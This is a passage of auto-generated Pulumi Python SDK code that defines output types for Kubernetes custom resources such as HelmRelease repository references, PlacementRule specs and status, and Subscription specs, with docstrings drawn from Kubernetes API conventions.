def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseRepoConfigMapRef(dict):
"""
Configuration parameters to access the helm-repo defined in the CatalogSource
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
Configuration parameters to access the helm-repo defined in the CatalogSource
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseRepoSecretRef(dict):
"""
Secret to use to access the helm-repo defined in the CatalogSource.
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
Secret to use to access the helm-repo defined in the CatalogSource.
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseRepoSource(dict):
"""
INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html Source holds the url toward the helm-chart
"""
def __init__(__self__, *,
github: Optional['outputs.HelmReleaseRepoSourceGithub'] = None,
helm_repo: Optional['outputs.HelmReleaseRepoSourceHelmRepo'] = None,
type: Optional[str] = None):
"""
INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html Source holds the url toward the helm-chart
:param 'HelmReleaseRepoSourceGithubArgs' github: GitHub provides the parameters to access the helm-chart located in a github repo
:param 'HelmReleaseRepoSourceHelmRepoArgs' helm_repo: HelmRepo provides the urls to retrieve the helm-chart
:param str type: SourceTypeEnum types of sources
"""
if github is not None:
pulumi.set(__self__, "github", github)
if helm_repo is not None:
pulumi.set(__self__, "helm_repo", helm_repo)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def github(self) -> Optional['outputs.HelmReleaseRepoSourceGithub']:
"""
GitHub provides the parameters to access the helm-chart located in a github repo
"""
return pulumi.get(self, "github")
@property
@pulumi.getter(name="helmRepo")
def helm_repo(self) -> Optional['outputs.HelmReleaseRepoSourceHelmRepo']:
"""
HelmRepo provides the urls to retrieve the helm-chart
"""
return pulumi.get(self, "helm_repo")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
SourceTypeEnum types of sources
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseRepoSourceGithub(dict):
"""
GitHub provides the parameters to access the helm-chart located in a github repo
"""
def __init__(__self__, *,
branch: Optional[str] = None,
chart_path: Optional[str] = None,
urls: Optional[Sequence[str]] = None):
"""
GitHub provides the parameters to access the helm-chart located in a github repo
"""
if branch is not None:
pulumi.set(__self__, "branch", branch)
if chart_path is not None:
pulumi.set(__self__, "chart_path", chart_path)
if urls is not None:
pulumi.set(__self__, "urls", urls)
@property
@pulumi.getter
def branch(self) -> Optional[str]:
return pulumi.get(self, "branch")
@property
@pulumi.getter(name="chartPath")
def chart_path(self) -> Optional[str]:
return pulumi.get(self, "chart_path")
@property
@pulumi.getter
def urls(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "urls")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseRepoSourceHelmRepo(dict):
"""
HelmRepo provides the urls to retrieve the helm-chart
"""
def __init__(__self__, *,
urls: Optional[Sequence[str]] = None):
"""
HelmRepo provides the urls to retrieve the helm-chart
"""
if urls is not None:
pulumi.set(__self__, "urls", urls)
@property
@pulumi.getter
def urls(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "urls")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseStatus(dict):
def __init__(__self__, *,
conditions: Sequence['outputs.HelmReleaseStatusConditions'],
deployed_release: Optional['outputs.HelmReleaseStatusDeployedRelease'] = None):
pulumi.set(__self__, "conditions", conditions)
if deployed_release is not None:
pulumi.set(__self__, "deployed_release", deployed_release)
@property
@pulumi.getter
def conditions(self) -> Sequence['outputs.HelmReleaseStatusConditions']:
return pulumi.get(self, "conditions")
@property
@pulumi.getter(name="deployedRelease")
def deployed_release(self) -> Optional['outputs.HelmReleaseStatusDeployedRelease']:
return pulumi.get(self, "deployed_release")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseStatusConditions(dict):
def __init__(__self__, *,
status: str,
type: str,
last_transition_time: Optional[str] = None,
message: Optional[str] = None,
reason: Optional[str] = None):
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> str:
return pulumi.get(self, "status")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[str]:
return pulumi.get(self, "last_transition_time")
@property
@pulumi.getter
def message(self) -> Optional[str]:
return pulumi.get(self, "message")
@property
@pulumi.getter
def reason(self) -> Optional[str]:
return pulumi.get(self, "reason")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseStatusDeployedRelease(dict):
def __init__(__self__, *,
manifest: Optional[str] = None,
name: Optional[str] = None):
if manifest is not None:
pulumi.set(__self__, "manifest", manifest)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def manifest(self) -> Optional[str]:
return pulumi.get(self, "manifest")
@property
@pulumi.getter
def name(self) -> Optional[str]:
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpec(dict):
"""
PlacementRuleSpec defines the desired state of PlacementRule
"""
def __init__(__self__, *,
cluster_conditions: Optional[Sequence['outputs.PlacementRuleSpecClusterConditions']] = None,
cluster_replicas: Optional[int] = None,
cluster_selector: Optional['outputs.PlacementRuleSpecClusterSelector'] = None,
clusters: Optional[Sequence['outputs.PlacementRuleSpecClusters']] = None,
policies: Optional[Sequence['outputs.PlacementRuleSpecPolicies']] = None,
resource_hint: Optional['outputs.PlacementRuleSpecResourceHint'] = None,
scheduler_name: Optional[str] = None):
"""
PlacementRuleSpec defines the desired state of PlacementRule
:param int cluster_replicas: number of replicas Application wants to
:param 'PlacementRuleSpecClusterSelectorArgs' cluster_selector: A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param Sequence['PlacementRuleSpecPoliciesArgs'] policies: Set Policy Filters
:param 'PlacementRuleSpecResourceHintArgs' resource_hint: Select Resource
:param str scheduler_name: INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "make" to regenerate code after modifying this file schedulerName, default to use mcm controller
"""
if cluster_conditions is not None:
pulumi.set(__self__, "cluster_conditions", cluster_conditions)
if cluster_replicas is not None:
pulumi.set(__self__, "cluster_replicas", cluster_replicas)
if cluster_selector is not None:
pulumi.set(__self__, "cluster_selector", cluster_selector)
if clusters is not None:
pulumi.set(__self__, "clusters", clusters)
if policies is not None:
pulumi.set(__self__, "policies", policies)
if resource_hint is not None:
pulumi.set(__self__, "resource_hint", resource_hint)
if scheduler_name is not None:
pulumi.set(__self__, "scheduler_name", scheduler_name)
@property
@pulumi.getter(name="clusterConditions")
def cluster_conditions(self) -> Optional[Sequence['outputs.PlacementRuleSpecClusterConditions']]:
return pulumi.get(self, "cluster_conditions")
@property
@pulumi.getter(name="clusterReplicas")
def cluster_replicas(self) -> Optional[int]:
"""
number of replicas Application wants to
"""
return pulumi.get(self, "cluster_replicas")
@property
@pulumi.getter(name="clusterSelector")
def cluster_selector(self) -> Optional['outputs.PlacementRuleSpecClusterSelector']:
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
return pulumi.get(self, "cluster_selector")
@property
@pulumi.getter
def clusters(self) -> Optional[Sequence['outputs.PlacementRuleSpecClusters']]:
return pulumi.get(self, "clusters")
@property
@pulumi.getter
def policies(self) -> Optional[Sequence['outputs.PlacementRuleSpecPolicies']]:
"""
Set Policy Filters
"""
return pulumi.get(self, "policies")
@property
@pulumi.getter(name="resourceHint")
def resource_hint(self) -> Optional['outputs.PlacementRuleSpecResourceHint']:
"""
Select Resource
"""
return pulumi.get(self, "resource_hint")
@property
@pulumi.getter(name="schedulerName")
def scheduler_name(self) -> Optional[str]:
"""
INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "make" to regenerate code after modifying this file schedulerName, default to use mcm controller
"""
return pulumi.get(self, "scheduler_name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecClusterConditions(dict):
"""
ClusterConditionFilter defines filter to filter cluster condition
"""
def __init__(__self__, *,
status: Optional[str] = None,
type: Optional[str] = None):
"""
ClusterConditionFilter defines filter to filter cluster condition
"""
if status is not None:
pulumi.set(__self__, "status", status)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def status(self) -> Optional[str]:
return pulumi.get(self, "status")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecClusterSelector(dict):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.PlacementRuleSpecClusterSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param Sequence['PlacementRuleSpecClusterSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.PlacementRuleSpecClusterSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecClusterSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecClusters(dict):
"""
GenericClusterReference - in alignment with kubefed
"""
def __init__(__self__, *,
name: str):
"""
GenericClusterReference - in alignment with kubefed
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecPolicies(dict):
"""
ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecResourceHint(dict):
"""
Select Resource
"""
def __init__(__self__, *,
order: Optional[str] = None,
type: Optional[str] = None):
"""
Select Resource
:param str order: SelectionOrder is the type for Nodes
:param str type: ResourceType defines types can be sorted
"""
if order is not None:
pulumi.set(__self__, "order", order)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def order(self) -> Optional[str]:
"""
SelectionOrder is the type for Nodes
"""
return pulumi.get(self, "order")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
ResourceType defines types can be sorted
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleStatus(dict):
"""
PlacementRuleStatus defines the observed state of PlacementRule
"""
def __init__(__self__, *,
decisions: Optional[Sequence['outputs.PlacementRuleStatusDecisions']] = None):
"""
PlacementRuleStatus defines the observed state of PlacementRule
:param Sequence['PlacementRuleStatusDecisionsArgs'] decisions: INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "make" to regenerate code after modifying this file
"""
if decisions is not None:
pulumi.set(__self__, "decisions", decisions)
@property
@pulumi.getter
def decisions(self) -> Optional[Sequence['outputs.PlacementRuleStatusDecisions']]:
"""
INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "make" to regenerate code after modifying this file
"""
return pulumi.get(self, "decisions")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleStatusDecisions(dict):
"""
PlacementDecision defines the decision made by controller
"""
def __init__(__self__, *,
cluster_name: Optional[str] = None,
cluster_namespace: Optional[str] = None):
"""
PlacementDecision defines the decision made by controller
"""
if cluster_name is not None:
pulumi.set(__self__, "cluster_name", cluster_name)
if cluster_namespace is not None:
pulumi.set(__self__, "cluster_namespace", cluster_namespace)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> Optional[str]:
return pulumi.get(self, "cluster_name")
@property
@pulumi.getter(name="clusterNamespace")
def cluster_namespace(self) -> Optional[str]:
return pulumi.get(self, "cluster_namespace")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpec(dict):
"""
SubscriptionSpec defines the desired state of Subscription
"""
def __init__(__self__, *,
channel: str,
hooksecretref: Optional['outputs.SubscriptionSpecHooksecretref'] = None,
name: Optional[str] = None,
overrides: Optional[Sequence['outputs.SubscriptionSpecOverrides']] = None,
package_filter: Optional['outputs.SubscriptionSpecPackageFilter'] = None,
package_overrides: Optional[Sequence['outputs.SubscriptionSpecPackageOverrides']] = None,
placement: Optional['outputs.SubscriptionSpecPlacement'] = None,
timewindow: Optional['outputs.SubscriptionSpecTimewindow'] = None):
"""
SubscriptionSpec defines the desired state of Subscription
:param 'SubscriptionSpecHooksecretrefArgs' hooksecretref: ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
:param str name: To specify 1 package in channel
:param Sequence['SubscriptionSpecOverridesArgs'] overrides: for hub use only to specify the overrides when apply to clusters
:param 'SubscriptionSpecPackageFilterArgs' package_filter: To specify more than 1 package in channel
:param Sequence['SubscriptionSpecPackageOverridesArgs'] package_overrides: To provide flexibility to override package in channel with local input
:param 'SubscriptionSpecPlacementArgs' placement: For hub use only, to specify which clusters to go to
:param 'SubscriptionSpecTimewindowArgs' timewindow: help user control when the subscription will take affect
"""
pulumi.set(__self__, "channel", channel)
if hooksecretref is not None:
pulumi.set(__self__, "hooksecretref", hooksecretref)
if name is not None:
pulumi.set(__self__, "name", name)
if overrides is not None:
pulumi.set(__self__, "overrides", overrides)
if package_filter is not None:
pulumi.set(__self__, "package_filter", package_filter)
if package_overrides is not None:
pulumi.set(__self__, "package_overrides", package_overrides)
if placement is not None:
pulumi.set(__self__, "placement", placement)
if timewindow is not None:
pulumi.set(__self__, "timewindow", timewindow)
@property
@pulumi.getter
def channel(self) -> str:
